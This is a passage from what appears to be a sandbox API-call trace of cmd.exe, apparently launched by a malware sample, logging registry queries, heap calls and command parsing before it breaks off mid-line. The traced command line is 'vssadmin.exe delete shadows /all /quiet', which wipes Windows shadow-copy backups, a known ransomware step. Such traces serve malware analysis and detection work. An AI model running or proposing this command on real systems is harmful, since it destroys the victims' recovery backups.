"LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 8 os_tid = 0x240 [0071.356] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1ef790 | out: lpSystemTimeAsFileTime=0x1ef790*(dwLowDateTime=0x7a771a20, dwHighDateTime=0x1d6b3a2)) [0071.356] GetCurrentProcessId () returned 0x730 [0071.356] GetCurrentThreadId () returned 0x240 [0071.356] GetTickCount () returned 0x1147a10 [0071.356] QueryPerformanceCounter (in: lpPerformanceCount=0x1ef798 | out: lpPerformanceCount=0x1ef798*=18846154066) returned 1 [0071.360] GetModuleHandleW (lpModuleName=0x0) returned 0x4a680000 [0071.360] __set_app_type (_Type=0x1) [0071.361] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a6a7810) returned 0x0 [0071.361] __getmainargs (in: _Argc=0x4a6ca608, _Argv=0x4a6ca618, _Env=0x4a6ca610, _DoWildCard=0, _StartInfo=0x4a6ae0f4 | out: _Argc=0x4a6ca608, _Argv=0x4a6ca618, _Env=0x4a6ca610) returned 0 [0071.361] GetCurrentThreadId () returned 0x240 [0071.361] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x240) returned 0x3c [0071.371] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77940000 [0071.371] GetProcAddress (hModule=0x77940000, lpProcName="SetThreadUILanguage") returned 0x77956d40 [0071.371] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0071.371] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0071.371] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ef728 | out: phkResult=0x1ef728*=0x0) returned 0x2 [0071.371] VirtualQuery (in: lpAddress=0x1ef710, lpBuffer=0x1ef690, dwLength=0x30 | out: lpBuffer=0x1ef690*(BaseAddress=0x1ef000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0071.372] VirtualQuery (in: lpAddress=0xf0000, lpBuffer=0x1ef690, dwLength=0x30 | out: lpBuffer=0x1ef690*(BaseAddress=0xf0000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000, __alignment2=0x0)) returned 0x30 [0071.372] VirtualQuery (in: lpAddress=0xf1000, lpBuffer=0x1ef690, dwLength=0x30 | out: lpBuffer=0x1ef690*(BaseAddress=0xf1000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x3000, State=0x1000, Protect=0x104, Type=0x20000, __alignment2=0x0)) returned 0x30 [0071.372] VirtualQuery (in: lpAddress=0xf4000, lpBuffer=0x1ef690, dwLength=0x30 | out: lpBuffer=0x1ef690*(BaseAddress=0xf4000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0xfc000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0071.372] VirtualQuery (in: lpAddress=0x1f0000, lpBuffer=0x1ef690, dwLength=0x30 | out: lpBuffer=0x1ef690*(BaseAddress=0x1f0000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0xe000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0071.372] GetConsoleOutputCP () returned 0x1b5 [0071.372] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a6bbfe0 | out: lpCPInfo=0x4a6bbfe0) returned 1 [0071.372] SetConsoleCtrlHandler (HandlerRoutine=0x4a6a3184, Add=1) returned 1 [0071.372] _get_osfhandle (_FileHandle=1) returned 0x2d4 [0071.372] SetConsoleMode (hConsoleHandle=0x2d4, dwMode=0x0) returned 0 [0071.373] _get_osfhandle (_FileHandle=1) returned 0x2d4 [0071.373] GetConsoleMode (in: hConsoleHandle=0x2d4, lpMode=0x4a6ae194 | out: lpMode=0x4a6ae194) returned 0 [0071.373] _get_osfhandle (_FileHandle=0) returned 0xfffffffffffffffe [0071.373] GetConsoleMode (in: hConsoleHandle=0xfffffffffffffffe, lpMode=0x4a6ae198 | out: lpMode=0x4a6ae198) returned 1 [0071.387] _get_osfhandle (_FileHandle=0) returned 0xfffffffffffffffe [0071.387] SetConsoleMode (hConsoleHandle=0xfffffffffffffffe, dwMode=0x7) returned 0 [0071.388] GetEnvironmentStringsW () returned 0x308a60* [0071.388] GetProcessHeap () returned 0x2f0000 [0071.388] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0xa7c) returned 0x3094f0 [0071.388] FreeEnvironmentStringsW (penv=0x308a60) returned 1 [0071.388] GetProcessHeap () returned 0x2f0000 [0071.388] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x8) returned 0x3088e0 [0071.388] GetEnvironmentStringsW () returned 0x308a60* [0071.388] GetProcessHeap () returned 0x2f0000 [0071.389] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0xa7c) returned 0x309f80 [0071.389] FreeEnvironmentStringsW (penv=0x308a60) returned 1 [0071.389] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1ee5e8 | out: phkResult=0x1ee5e8*=0x44) returned 0x0 [0071.389] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1ee5e0, lpData=0x1ee600, lpcbData=0x1ee5e4*=0x1000 | out: lpType=0x1ee5e0*=0x0, lpData=0x1ee600*=0x18, lpcbData=0x1ee5e4*=0x1000) returned 0x2 [0071.389] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1ee5e0, lpData=0x1ee600, lpcbData=0x1ee5e4*=0x1000 | out: lpType=0x1ee5e0*=0x4, lpData=0x1ee600*=0x1, lpcbData=0x1ee5e4*=0x4) returned 0x0 [0071.389] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1ee5e0, lpData=0x1ee600, lpcbData=0x1ee5e4*=0x1000 | out: lpType=0x1ee5e0*=0x0, lpData=0x1ee600*=0x1, lpcbData=0x1ee5e4*=0x1000) returned 0x2 [0071.389] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1ee5e0, lpData=0x1ee600, lpcbData=0x1ee5e4*=0x1000 | out: lpType=0x1ee5e0*=0x4, lpData=0x1ee600*=0x0, lpcbData=0x1ee5e4*=0x4) returned 0x0 [0071.389] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1ee5e0, lpData=0x1ee600, lpcbData=0x1ee5e4*=0x1000 | out: lpType=0x1ee5e0*=0x4, lpData=0x1ee600*=0x40, lpcbData=0x1ee5e4*=0x4) returned 0x0 [0071.389] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1ee5e0, lpData=0x1ee600, lpcbData=0x1ee5e4*=0x1000 | out: lpType=0x1ee5e0*=0x4, lpData=0x1ee600*=0x40, lpcbData=0x1ee5e4*=0x4) returned 0x0 [0071.389] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1ee5e0, lpData=0x1ee600, lpcbData=0x1ee5e4*=0x1000 | out: lpType=0x1ee5e0*=0x0, lpData=0x1ee600*=0x40, lpcbData=0x1ee5e4*=0x1000) returned 0x2 [0071.389] RegCloseKey (hKey=0x44) returned 0x0 [0071.389] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1ee5e8 | out: phkResult=0x1ee5e8*=0x44) returned 0x0 [0071.389] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1ee5e0, lpData=0x1ee600, lpcbData=0x1ee5e4*=0x1000 | out: lpType=0x1ee5e0*=0x0, lpData=0x1ee600*=0x40, lpcbData=0x1ee5e4*=0x1000) returned 0x2 [0071.390] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1ee5e0, lpData=0x1ee600, lpcbData=0x1ee5e4*=0x1000 | out: lpType=0x1ee5e0*=0x4, lpData=0x1ee600*=0x1, lpcbData=0x1ee5e4*=0x4) returned 0x0 [0071.390] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1ee5e0, lpData=0x1ee600, lpcbData=0x1ee5e4*=0x1000 | out: lpType=0x1ee5e0*=0x0, lpData=0x1ee600*=0x1, lpcbData=0x1ee5e4*=0x1000) returned 0x2 [0071.390] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1ee5e0, lpData=0x1ee600, lpcbData=0x1ee5e4*=0x1000 | out: lpType=0x1ee5e0*=0x4, lpData=0x1ee600*=0x0, lpcbData=0x1ee5e4*=0x4) returned 0x0 [0071.390] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1ee5e0, lpData=0x1ee600, lpcbData=0x1ee5e4*=0x1000 | out: lpType=0x1ee5e0*=0x4, lpData=0x1ee600*=0x9, lpcbData=0x1ee5e4*=0x4) returned 0x0 [0071.390] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1ee5e0, lpData=0x1ee600, lpcbData=0x1ee5e4*=0x1000 | out: lpType=0x1ee5e0*=0x4, lpData=0x1ee600*=0x9, lpcbData=0x1ee5e4*=0x4) returned 0x0 [0071.390] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1ee5e0, lpData=0x1ee600, lpcbData=0x1ee5e4*=0x1000 | out: lpType=0x1ee5e0*=0x0, lpData=0x1ee600*=0x9, lpcbData=0x1ee5e4*=0x1000) returned 0x2 [0071.390] RegCloseKey (hKey=0x44) returned 0x0 [0071.390] time (in: timer=0x0 | out: timer=0x0) returned 0x5fa44603 [0071.390] srand (_Seed=0x5fa44603) [0071.390] GetCommandLineW () returned="\"cmd.exe\" /c vssadmin.exe delete shadows /all /quiet" [0071.390] GetCommandLineW () returned="\"cmd.exe\" /c vssadmin.exe delete shadows /all /quiet" [0071.390] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a6bc0a0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0071.391] GetProcessHeap () returned 0x2f0000 [0071.391] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x218) returned 0x30aa10 [0071.391] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x30aa20, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0071.391] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a6af360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0071.391] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a6af360, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0071.391] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a6af360, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0071.391] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0071.391] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0071.391] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0071.391] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0071.391] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0071.391] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0071.391] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0071.391] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0071.391] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0071.391] GetProcessHeap () returned 0x2f0000 [0071.391] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x3094f0 | out: hHeap=0x2f0000) returned 1 [0071.392] GetEnvironmentStringsW () returned 0x308a60* [0071.392] GetProcessHeap () returned 0x2f0000 [0071.392] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0xa94) returned 0x30b6d0 [0071.392] FreeEnvironmentStringsW (penv=0x308a60) returned 1 [0071.392] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a6af360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0071.392] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a6af360, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0071.392] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0071.392] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0071.392] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0071.392] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0071.392] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0071.392] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0071.392] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0071.392] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0071.392] GetProcessHeap () returned 0x2f0000 [0071.392] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x5c) returned 0x2f1320 [0071.392] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1ef3f0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0071.392] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x104, lpBuffer=0x1ef3f0, lpFilePart=0x1ef3d0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x1ef3d0*="Desktop") returned 0x25 [0071.392] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0071.393] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x1ef100 | out: lpFindFileData=0x1ef100*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xe60000e6, cFileName="Users", cAlternateFileName="")) returned 0x2f1390 [0071.393] FindClose (in: hFindFile=0x2f1390 | out: hFindFile=0x2f1390) returned 1 [0071.393] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x1ef100 | out: lpFindFileData=0x1ef100*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xe60000e6, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 0x2f1390 [0071.393] FindClose (in: hFindFile=0x2f1390 | out: hFindFile=0x2f1390) returned 1 [0071.393] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0071.393] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x1ef100 | out: lpFindFileData=0x1ef100*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6db47080, ftLastAccessTime.dwHighDateTime=0x1d6b3a2, ftLastWriteTime.dwLowDateTime=0x6db47080, ftLastWriteTime.dwHighDateTime=0x1d6b3a2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xe60000e6, cFileName="Desktop", cAlternateFileName="")) returned 0x2f1390 [0071.393] FindClose (in: hFindFile=0x2f1390 | out: hFindFile=0x2f1390) returned 1 [0071.393] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0071.393] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0071.393] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0071.394] GetProcessHeap () returned 0x2f0000 [0071.394] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x30b6d0 | out: hHeap=0x2f0000) returned 1 [0071.394] GetEnvironmentStringsW () returned 0x308a60* [0071.394] GetProcessHeap () returned 0x2f0000 [0071.394] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0xae8) returned 0x30ac30 [0071.394] FreeEnvironmentStringsW (penv=0x308a60) returned 1 [0071.394] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a6bc0a0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0071.394] GetProcessHeap () returned 0x2f0000 [0071.394] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x2f1320 | out: hHeap=0x2f0000) returned 1 [0071.394] GetProcessHeap () returned 0x2f0000 [0071.394] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x4016) returned 0x30cc60 [0071.394] GetProcessHeap () returned 0x2f0000 [0071.394] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x64) returned 0x30b720 [0071.394] GetProcessHeap () returned 0x2f0000 [0071.394] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x30cc60 | out: hHeap=0x2f0000) returned 1 [0071.395] GetConsoleOutputCP () returned 0x1b5 [0071.395] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a6bbfe0 | out: lpCPInfo=0x4a6bbfe0) returned 1 [0071.395] GetUserDefaultLCID () returned 0x409 [0071.396] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a6b7b50, cchData=8 | out: lpLCData=":") returned 2 [0071.396] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x1ef500, cchData=128 | out: lpLCData="0") returned 2 [0071.396] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x1ef500, cchData=128 | out: lpLCData="0") returned 2 [0071.396] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x1ef500, cchData=128 | out: lpLCData="1") returned 2 [0071.396] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a6ca740, cchData=8 | out: lpLCData="/") returned 2 [0071.396] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a6ca4a0, cchData=32 | out: lpLCData="Mon") returned 4 [0071.396] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a6ca460, cchData=32 | out: lpLCData="Tue") returned 4 [0071.396] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a6ca420, cchData=32 | out: lpLCData="Wed") returned 4 [0071.396] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a6ca3e0, cchData=32 | out: lpLCData="Thu") returned 4 [0071.396] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a6ca3a0, cchData=32 | out: lpLCData="Fri") returned 4 [0071.396] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a6ca360, cchData=32 | out: lpLCData="Sat") returned 4 [0071.396] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a6ca700, cchData=32 | out: lpLCData="Sun") returned 4 [0071.396] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a6b7b40, cchData=8 | out: lpLCData=".") returned 2 [0071.397] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a6ca4e0, cchData=8 | out: lpLCData=",") returned 2 [0071.397] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0071.398] GetProcessHeap () returned 0x2f0000 [0071.398] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x0, Size=0x20c) returned 0x30b800 [0071.398] GetConsoleTitleW (in: lpConsoleTitle=0x30b800, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0071.398] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77940000 [0071.398] GetProcAddress (hModule=0x77940000, lpProcName="CopyFileExW") returned 0x779523d0 [0071.398] GetProcAddress (hModule=0x77940000, lpProcName="IsDebuggerPresent") returned 0x77948290 [0071.398] GetProcAddress (hModule=0x77940000, lpProcName="SetConsoleInputExeNameW") returned 0x779517e0 [0071.399] GetProcessHeap () returned 0x2f0000 [0071.399] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x4012) returned 0x30cc60 [0071.399] GetProcessHeap () returned 0x2f0000 [0071.399] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x30cc60 | out: hHeap=0x2f0000) returned 1 [0071.400] _wcsicmp (_String1="vssadmin.exe", _String2=")") returned 77 [0071.400] _wcsicmp (_String1="FOR", _String2="vssadmin.exe") returned -16 [0071.400] _wcsicmp (_String1="FOR/?", _String2="vssadmin.exe") returned -16 [0071.400] _wcsicmp (_String1="IF", _String2="vssadmin.exe") returned -13 [0071.400] _wcsicmp (_String1="IF/?", _String2="vssadmin.exe") returned -13 [0071.400] _wcsicmp (_String1="REM", _String2="vssadmin.exe") returned -4 [0071.400] _wcsicmp (_String1="REM/?", _String2="vssadmin.exe") returned -4 [0071.400] GetProcessHeap () returned 0x2f0000 [0071.400] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0xb0) returned 0x30ba20 [0071.400] GetProcessHeap () returned 0x2f0000 [0071.400] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x2a) returned 0x306440 [0071.401] GetProcessHeap () returned 0x2f0000 [0071.401] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x48) returned 0x30bae0 [0071.402] GetConsoleTitleW (in: lpConsoleTitle=0x1ef410, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0071.419] GetFileAttributesW (lpFileName="vssadmin.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\vssadmin.exe")) returned 0xffffffff [0071.419] _wcsicmp (_String1="vssadmin", _String2="DIR") returned 18 [0071.419] _wcsicmp (_String1="vssadmin", _String2="ERASE") returned 17 [0071.419] _wcsicmp (_String1="vssadmin", _String2="DEL") returned 18 [0071.420] _wcsicmp (_String1="vssadmin", _String2="TYPE") returned 2 [0071.420] _wcsicmp (_String1="vssadmin", _String2="COPY") returned 19 [0071.420] _wcsicmp (_String1="vssadmin", _String2="CD") returned 19 [0071.420] _wcsicmp (_String1="vssadmin", _String2="CHDIR") returned 19 [0071.420] _wcsicmp (_String1="vssadmin", _String2="RENAME") returned 4 [0071.420] _wcsicmp (_String1="vssadmin", _String2="REN") returned 4 [0071.420] _wcsicmp (_String1="vssadmin", _String2="ECHO") returned 17 [0071.420] _wcsicmp (_String1="vssadmin", _String2="SET") returned 3 [0071.420] _wcsicmp (_String1="vssadmin", _String2="PAUSE") returned 6 [0071.420] _wcsicmp (_String1="vssadmin", _String2="DATE") returned 18 [0071.420] _wcsicmp (_String1="vssadmin", _String2="TIME") returned 2 [0071.420] _wcsicmp (_String1="vssadmin", _String2="PROMPT") returned 6 [0071.420] _wcsicmp (_String1="vssadmin", _String2="MD") returned 9 [0071.420] _wcsicmp (_String1="vssadmin", _String2="MKDIR") returned 9 [0071.420] _wcsicmp (_String1="vssadmin", _String2="RD") returned 4 [0071.420] _wcsicmp (_String1="vssadmin", _String2="RMDIR") returned 4 [0071.420] _wcsicmp (_String1="vssadmin", _String2="PATH") returned 6 [0071.420] _wcsicmp (_String1="vssadmin", _String2="GOTO") returned 15 [0071.420] _wcsicmp (_String1="vssadmin", _String2="SHIFT") returned 3 [0071.420] _wcsicmp (_String1="vssadmin", _String2="CLS") returned 19 [0071.420] _wcsicmp (_String1="vssadmin", _String2="CALL") returned 19 [0071.420] _wcsicmp (_String1="vssadmin", _String2="VERIFY") returned 14 [0071.420] _wcsicmp (_String1="vssadmin", _String2="VER") returned 14 [0071.420] _wcsicmp (_String1="vssadmin", _String2="VOL") returned 4 [0071.420] _wcsicmp (_String1="vssadmin", _String2="EXIT") returned 17 [0071.420] _wcsicmp (_String1="vssadmin", _String2="SETLOCAL") returned 3 [0071.420] _wcsicmp (_String1="vssadmin", _String2="ENDLOCAL") returned 17 [0071.420] _wcsicmp (_String1="vssadmin", _String2="TITLE") returned 2 [0071.420] _wcsicmp (_String1="vssadmin", _String2="START") returned 3 [0071.421] _wcsicmp (_String1="vssadmin", _String2="DPATH") returned 18 [0071.421] _wcsicmp (_String1="vssadmin", _String2="KEYS") returned 11 [0071.421] _wcsicmp (_String1="vssadmin", _String2="MOVE") returned 9 [0071.421] _wcsicmp (_String1="vssadmin", _String2="PUSHD") returned 6 [0071.421] _wcsicmp (_String1="vssadmin", _String2="POPD") returned 6 [0071.421] _wcsicmp (_String1="vssadmin", _String2="ASSOC") returned 21 [0071.421] _wcsicmp (_String1="vssadmin", _String2="FTYPE") returned 16 [0071.421] _wcsicmp (_String1="vssadmin", _String2="BREAK") returned 20 [0071.421] _wcsicmp (_String1="vssadmin", _String2="COLOR") returned 19 [0071.421] _wcsicmp (_String1="vssadmin", _String2="MKLINK") returned 9 [0071.421] _wcsicmp (_String1="vssadmin", _String2="DIR") returned 18 [0071.421] _wcsicmp (_String1="vssadmin", _String2="ERASE") returned 17 [0071.421] _wcsicmp (_String1="vssadmin", _String2="DEL") returned 18 [0071.421] _wcsicmp (_String1="vssadmin", _String2="TYPE") returned 2 [0071.421] _wcsicmp (_String1="vssadmin", _String2="COPY") returned 19 [0071.421] _wcsicmp (_String1="vssadmin", _String2="CD") returned 19 [0071.421] _wcsicmp (_String1="vssadmin", _String2="CHDIR") returned 19 [0071.422] _wcsicmp (_String1="vssadmin", _String2="RENAME") returned 4 [0071.422] _wcsicmp (_String1="vssadmin", _String2="REN") returned 4 [0071.422] _wcsicmp (_String1="vssadmin", _String2="ECHO") returned 17 [0071.422] _wcsicmp (_String1="vssadmin", _String2="SET") returned 3 [0071.422] _wcsicmp (_String1="vssadmin", _String2="PAUSE") returned 6 [0071.422] _wcsicmp (_String1="vssadmin", _String2="DATE") returned 18 [0071.422] _wcsicmp (_String1="vssadmin", _String2="TIME") returned 2 [0071.422] _wcsicmp (_String1="vssadmin", _String2="PROMPT") returned 6 [0071.422] _wcsicmp (_String1="vssadmin", _String2="MD") returned 9 [0071.422] _wcsicmp (_String1="vssadmin", _String2="MKDIR") returned 9 [0071.422] _wcsicmp (_String1="vssadmin", _String2="RD") returned 4 [0071.422] _wcsicmp (_String1="vssadmin", _String2="RMDIR") returned 4 [0071.422] _wcsicmp (_String1="vssadmin", _String2="PATH") returned 6 [0071.422] _wcsicmp (_String1="vssadmin", _String2="GOTO") returned 15 [0071.422] _wcsicmp (_String1="vssadmin", _String2="SHIFT") returned 3 [0071.422] _wcsicmp (_String1="vssadmin", _String2="CLS") returned 19 [0071.422] _wcsicmp (_String1="vssadmin", _String2="CALL") returned 19 [0071.422] _wcsicmp (_String1="vssadmin", _String2="VERIFY") returned 14 [0071.422] _wcsicmp (_String1="vssadmin", _String2="VER") returned 14 [0071.422] _wcsicmp (_String1="vssadmin", _String2="VOL") returned 4 [0071.422] _wcsicmp (_String1="vssadmin", _String2="EXIT") returned 17 [0071.422] _wcsicmp (_String1="vssadmin", _String2="SETLOCAL") returned 3 [0071.422] _wcsicmp (_String1="vssadmin", _String2="ENDLOCAL") returned 17 [0071.422] _wcsicmp (_String1="vssadmin", _String2="TITLE") returned 2 [0071.422] _wcsicmp (_String1="vssadmin", _String2="START") returned 3 [0071.422] _wcsicmp (_String1="vssadmin", 